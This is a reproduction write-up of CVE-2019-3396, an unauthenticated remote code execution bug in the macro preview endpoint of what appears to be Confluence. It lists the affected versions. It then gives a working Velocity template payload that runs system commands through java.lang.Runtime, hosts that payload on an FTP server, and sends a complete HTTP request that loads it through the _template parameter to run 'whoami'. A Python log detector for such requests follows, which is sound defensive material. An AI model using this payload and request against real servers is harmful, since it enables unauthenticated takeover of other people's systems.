(CVE-2019-3396) Unauthenticated RCE vulnerability

1. Vulnerability overview

(CVE-2019-3396) Unauthenticated RCE vulnerability

2. Affected versions

  • All 6.6.x versions before 6.6.12
  • All 6.12.x versions before 6.12.3
  • All 6.13.x versions before 6.13.13
  • All 6.14.x versions before 6.14.2

3. Reproduction steps

Step 1. Start an FTP service and place the template file r.vm in its root directory:

#set ($exp="exp")
#set ($a=$exp.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($command))
#set ($input=$exp.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a))
#set($sc = $exp.getClass().forName("java.util.Scanner"))
#set($constructor = $sc.getDeclaredConstructor($exp.getClass().forName("java.io.InputStream")))
#set($scan=$constructor.newInstance($input).useDelimiter("\\A"))
#if($scan.hasNext())
    $scan.next()
#end

For this demonstration, a Python FTP server is used:

pip install pyftpdlib 
python -m pyftpdlib -p 8883

Step 2. Command execution with the output echoed back in the response:

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: localhost:8090
Content-Length: 193
Accept: text/plain, */*; q=0.01
Origin: http://localhost:8090
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Content-Type: application/json; charset=UTF-8
Referer: http://localhost:8090/
Connection: close

{"contentId":"1","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"ftp://127.0.0.1:8883/r.vm","command":"whoami"},"body":""}}
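The request above is the detection signal a defender should look for: a macro preview call whose JSON body carries a client-supplied `_template` parameter, especially one pointing at a remote scheme. The following detector is an added example for this writeup, not code from the original page; it assumes access-log records have been pre-parsed into (request path, request body) pairs, and the sample records are constructed inline.

```python
import json
from urllib.parse import urlsplit

# Endpoint abused in the writeup and the macro parameter that carries the template location.
PREVIEW_PATH = "/rest/tinymce/1/macro/preview"
TEMPLATE_PARAM = "_template"
REMOTE_SCHEMES = {"ftp", "http", "https"}


def classify_preview_request(path, body):
    """Return a reason string if the request looks like a CVE-2019-3396 attempt, else None."""
    if not path.startswith(PREVIEW_PATH):
        return None
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return "non-JSON body sent to macro preview endpoint"
    macro = data.get("macro", {}) if isinstance(data, dict) else {}
    params = macro.get("params", {}) if isinstance(macro, dict) else {}
    if not isinstance(params, dict) or TEMPLATE_PARAM not in params:
        return None  # the normal widget preview never names a template
    template = str(params[TEMPLATE_PARAM])
    scheme = urlsplit(template).scheme.lower()
    if scheme in REMOTE_SCHEMES:
        return "_template points to a remote resource via %s://" % scheme
    if "../" in template or template.startswith("/"):
        return "_template path traversal outside the bundled templates"
    return "client-supplied _template parameter"


# Constructed sample records: (path, body). Record 0 mirrors the request in this writeup.
SAMPLE_LOG = [
    (PREVIEW_PATH, '{"contentId":"1","macro":{"name":"widget","params":{'
                   '"url":"https://www.viddler.com/v/test","_template":"ftp://127.0.0.1:8883/r.vm",'
                   '"command":"whoami"},"body":""}}'),
    (PREVIEW_PATH, '{"contentId":"1","macro":{"name":"widget","params":{'
                   '"url":"https://www.viddler.com/v/test","width":"400"},"body":""}}'),
    ("/rest/api/content", '{"type":"page"}'),
]


def scan_log(records):
    """Return (index, reason) for every record that should raise an alert."""
    hits = []
    for i, (path, body) in enumerate(records):
        reason = classify_preview_request(path, body)
        if reason:
            hits.append((i, reason))
    return hits


if __name__ == "__main__":
    for idx, why in scan_log(SAMPLE_LOG):
        print("ALERT record %d: %s" % (idx, why))
```

Only the first constructed record is flagged; a benign widget preview without `_template` and an unrelated REST call pass through silently.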


零组资料文库 all rights reserved, powered by 0-sec.org. Reproduction without authorization is prohibited. 2019-11-04 00:39:10
